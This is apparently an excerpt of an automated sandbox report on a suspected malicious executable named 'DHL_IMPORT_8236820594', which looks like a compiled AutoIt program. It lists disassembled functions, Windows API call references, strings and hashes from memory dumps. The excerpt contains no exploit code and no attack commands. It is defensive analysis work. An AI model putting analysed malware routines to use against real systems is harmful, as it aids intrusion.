                                                                                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                          • Instruction ID: 39f930a101bb129e87250b956ff467131e5f4799d4802a777cb5e0622e6ed232
                                                                                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                          • Instruction Fuzzy Hash: 619189322080E78ADB29863E857403DFFF15A523B2B5A079DD5F2CA3C5FE18D954D620
                                                                                          Function 007F19B0 Relevance: .2, Instructions: 240COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                          • Instruction ID: 8a9195f4c77b99e21a10af909d5342df17ceddee30e8e038d80cff7d9863b7d7
                                                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                          • Instruction Fuzzy Hash: F791B5722090E7CEDB2D427E847403DFFE15A923A2B5A479ED5F2CA2C1FD18D554D620
                                                                                          Function 007F7A4A Relevance: .2, Instructions: 237COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 60b04304180f4988d125a78d4f74dc041f2013c7ffaad1da1a4cfef8c6894916
                                                                                          • Instruction ID: 6ea40b68e94a1973d9bd815c2adffe9e9873642de09b615391574b10098e0715
                                                                                          • Opcode Fuzzy Hash: 60b04304180f4988d125a78d4f74dc041f2013c7ffaad1da1a4cfef8c6894916
                                                                                          • Instruction Fuzzy Hash: 18615BB120C74DD6EE3C9A2C8C99BBE2398DF42710F14491EEB42DB381D65D9E42C366
                                                                                          Function 007F7CA7 Relevance: .2, Instructions: 237COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c54422869cea31ccfa8243d3bd3680f9ba7660831aa601aa4b26e6331c4ff529
                                                                                          • Instruction ID: 865c5865079023dd433276e01e649c107acda98af9e1d503d031be845b2d5998
                                                                                          • Opcode Fuzzy Hash: c54422869cea31ccfa8243d3bd3680f9ba7660831aa601aa4b26e6331c4ff529
                                                                                          • Instruction Fuzzy Hash: 6D617B3170C70D97DE3C8A285896BBF2389EF42704F90495AEB42DF381DA5EAD42C356
                                                                                          Function 007F1706 Relevance: .2, Instructions: 232COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                          • Instruction ID: 79f0c629a27db7b9ce208fb1308dc0eb90ae58a7305fabc89c961677a6f9678f
                                                                                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                          • Instruction Fuzzy Hash: 1F8184326080E78DDB2D827A853403EFFE15A923B1B5A079DD5F6CB3C1EE28D554E660
                                                                                          Function 03ABD490 Relevance: .1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                          • Instruction ID: 8db2ca21b144502af225efd7d53e8afb207fd7563deecd975a6d925db48d0d07
                                                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                          • Instruction Fuzzy Hash: 6741C071D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                          Function 00842046 Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 704ad2514af668cc05ae5ff3e948e1fcf7e4942540b19aeafd400948372e506c
                                                                                          • Instruction ID: 79a9e53ce2068e4f66f8a5ec2927846b83d866efeda8a92930cf5c669690c8be
                                                                                          • Opcode Fuzzy Hash: 704ad2514af668cc05ae5ff3e948e1fcf7e4942540b19aeafd400948372e506c
                                                                                          • Instruction Fuzzy Hash: AF21A5326216158BDB38CF79C82267A73E5F764320F55862EE4A7C37D0DE79A904CB80
                                                                                          Function 03ABD320 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                          • Instruction ID: eab6508ff011b64379b033b89c2acb2063b86394f6e1a75256a120d4e7923f6d
                                                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                          • Instruction Fuzzy Hash: 43019678A00209EFCB48DF98C5909ADF7F9FB48310F2085DAD805A7302D730AE41DB90
                                                                                          Function 03ABD380 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                          • Instruction ID: 5f414c8d91a0bdaad3d250e97677be6b6d7e3567040b9d14ed4df4e8bbbeae48
                                                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                          • Instruction Fuzzy Hash: E8019678A00209EFCB48DF98C5909ADF7B9FB48310F24859AD809A7306D730AE51DB90
                                                                                          Function 03ABBD10 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                          Function 00852ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(00000000), ref: 00852B30
                                                                                          • DeleteObject.GDI32(00000000), ref: 00852B43
                                                                                          • DestroyWindow.USER32 ref: 00852B52
                                                                                          • GetDesktopWindow.USER32 ref: 00852B6D
                                                                                          • GetWindowRect.USER32(00000000), ref: 00852B74
                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00852CA3
                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00852CB1
                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852CF8
                                                                                          • GetClientRect.USER32(00000000,?), ref: 00852D04
                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00852D40
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D62
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D75
                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D80
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00852D89
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D98
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00852DA1
                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852DA8
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00852DB3
                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852DC5
                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0086FC38,00000000), ref: 00852DDB
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00852DEB
                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00852E11
                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00852E30
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852E52
                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085303F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                          • API String ID: 2211948467-2373415609
                                                                                          • Opcode ID: 978bc3edb4a9f9298350cb1e2fdbaaf8aac9a8aecfc32ed43b7e228389254e9f
                                                                                          • Instruction ID: ae56c2a66f0be0d359cbe74050d8992accedaaa279fa380d19479e99d6375102
                                                                                          • Opcode Fuzzy Hash: 978bc3edb4a9f9298350cb1e2fdbaaf8aac9a8aecfc32ed43b7e228389254e9f
                                                                                          • Instruction Fuzzy Hash: 01027871A00209EFDB14DFA4DC89EAE7BB9FB49311F018159F915EB2A1DB74AD04CB60
                                                                                          Function 008670D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0086712F
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00867160
                                                                                          • GetSysColor.USER32(0000000F), ref: 0086716C
                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00867186
                                                                                          • SelectObject.GDI32(?,?), ref: 00867195
                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 008671C0
                                                                                          • GetSysColor.USER32(00000010), ref: 008671C8
                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 008671CF
                                                                                          • FrameRect.USER32(?,?,00000000), ref: 008671DE
                                                                                          • DeleteObject.GDI32(00000000), ref: 008671E5
                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00867230
                                                                                          • FillRect.USER32(?,?,?), ref: 00867262
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00867284
                                                                                            • Part of subcall function 008673E8: GetSysColor.USER32(00000012), ref: 00867421
                                                                                            • Part of subcall function 008673E8: SetTextColor.GDI32(?,?), ref: 00867425
                                                                                            • Part of subcall function 008673E8: GetSysColorBrush.USER32(0000000F), ref: 0086743B
                                                                                            • Part of subcall function 008673E8: GetSysColor.USER32(0000000F), ref: 00867446
                                                                                            • Part of subcall function 008673E8: GetSysColor.USER32(00000011), ref: 00867463
                                                                                            • Part of subcall function 008673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00867471
                                                                                            • Part of subcall function 008673E8: SelectObject.GDI32(?,00000000), ref: 00867482
                                                                                            • Part of subcall function 008673E8: SetBkColor.GDI32(?,00000000), ref: 0086748B
                                                                                            • Part of subcall function 008673E8: SelectObject.GDI32(?,?), ref: 00867498
                                                                                            • Part of subcall function 008673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008674B7
                                                                                            • Part of subcall function 008673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008674CE
                                                                                            • Part of subcall function 008673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008674DB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                          • String ID:
                                                                                          • API String ID: 4124339563-0
                                                                                          • Opcode ID: 171e8d0906b2858c61443f08c4e3067d40b73cd43056dc58abe7f6f4a7bf2fc1
                                                                                          • Instruction ID: 6ad0e1f72cdd5f1886f730659112e9c6c54fdf6afc3e0089febf4f8e43a507bf
                                                                                          • Opcode Fuzzy Hash: 171e8d0906b2858c61443f08c4e3067d40b73cd43056dc58abe7f6f4a7bf2fc1
                                                                                          • Instruction Fuzzy Hash: 2FA1B172008301EFDB019F60DC49E6B7BA9FF49324F111A19FAA2D61E1D7B5E944CB92
                                                                                          Function 007E8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,?), ref: 007E8E14
                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00826AC5
                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00826AFE
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00826F43
                                                                                            • Part of subcall function 007E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007E8BE8,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8FC5
                                                                                          • SendMessageW.USER32(?,00001053), ref: 00826F7F
                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00826F96
                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00826FAC
                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00826FB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                          • String ID: 0
                                                                                          • API String ID: 2760611726-4108050209
                                                                                          • Opcode ID: 90dd9e3b137c36f0eac4acb1bb0b492bcc47baa1312d8d7dbee05dfd9bd5138f
                                                                                          • Instruction ID: a401b76d3064870bfb01b9ad9598859e5c03767a4dc918ef5cd891eee863cb23
                                                                                          • Opcode Fuzzy Hash: 90dd9e3b137c36f0eac4acb1bb0b492bcc47baa1312d8d7dbee05dfd9bd5138f
                                                                                          • Instruction Fuzzy Hash: E712DE34201261DFDB25DF24E848BA6BBE1FF49310F584069F489CB661DB35ECA1CB92
                                                                                          Function 00852711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(00000000), ref: 0085273E
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0085286A
                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008528A9
                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008528B9
                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00852900
                                                                                          • GetClientRect.USER32(00000000,?), ref: 0085290C
                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00852955
                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00852964
                                                                                          • GetStockObject.GDI32(00000011), ref: 00852974
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00852978
                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00852988
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00852991
                                                                                          • DeleteDC.GDI32(00000000), ref: 0085299A
                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008529C6
                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 008529DD
                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00852A1D
                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00852A31
                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00852A42
                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00852A77
                                                                                          • GetStockObject.GDI32(00000011), ref: 00852A82
                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00852A8D
                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00852A97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                          • API String ID: 2910397461-517079104
                                                                                          • Opcode ID: 366a31ed82b9eb89c506611523469fbc521b3d1202b2573fc7e747e92d0a9efe
                                                                                          • Instruction ID: a26443f3b851865ebabd85bd1657551a53ba2912501395053a27ba3441789f49
                                                                                          • Opcode Fuzzy Hash: 366a31ed82b9eb89c506611523469fbc521b3d1202b2573fc7e747e92d0a9efe
                                                                                          • Instruction Fuzzy Hash: D3B14B71A00219AFEB14DFA8DC49FAE7BB9FB09711F018115F915E7690DBB4AD40CBA0
                                                                                          Function 00844ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00844AED
                                                                                          • GetDriveTypeW.KERNEL32(?,0086CB68,?,\\.\,0086CC08), ref: 00844BCA
                                                                                          • SetErrorMode.KERNEL32(00000000,0086CB68,?,\\.\,0086CC08), ref: 00844D36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$DriveType
                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                          • API String ID: 2907320926-4222207086
                                                                                          • Opcode ID: 10d2807d2ff3dc7f492645edf0f75ffcb74b0f54b0869cff30a1ff9dd8c6e9cb
                                                                                          • Instruction ID: 19392841a8517a64945fab353e8c5123469cba3d6bdbaf89b2d0c028c4d9688f
                                                                                          • Opcode Fuzzy Hash: 10d2807d2ff3dc7f492645edf0f75ffcb74b0f54b0869cff30a1ff9dd8c6e9cb
                                                                                          • Instruction Fuzzy Hash: 1B619F3060520DDBCF04EB64CAC6A68B7B0FB44349B285016F816EB791EB3ADD51DB91
                                                                                          Function 008673E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSysColor.USER32(00000012), ref: 00867421
                                                                                          • SetTextColor.GDI32(?,?), ref: 00867425
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0086743B
                                                                                          • GetSysColor.USER32(0000000F), ref: 00867446
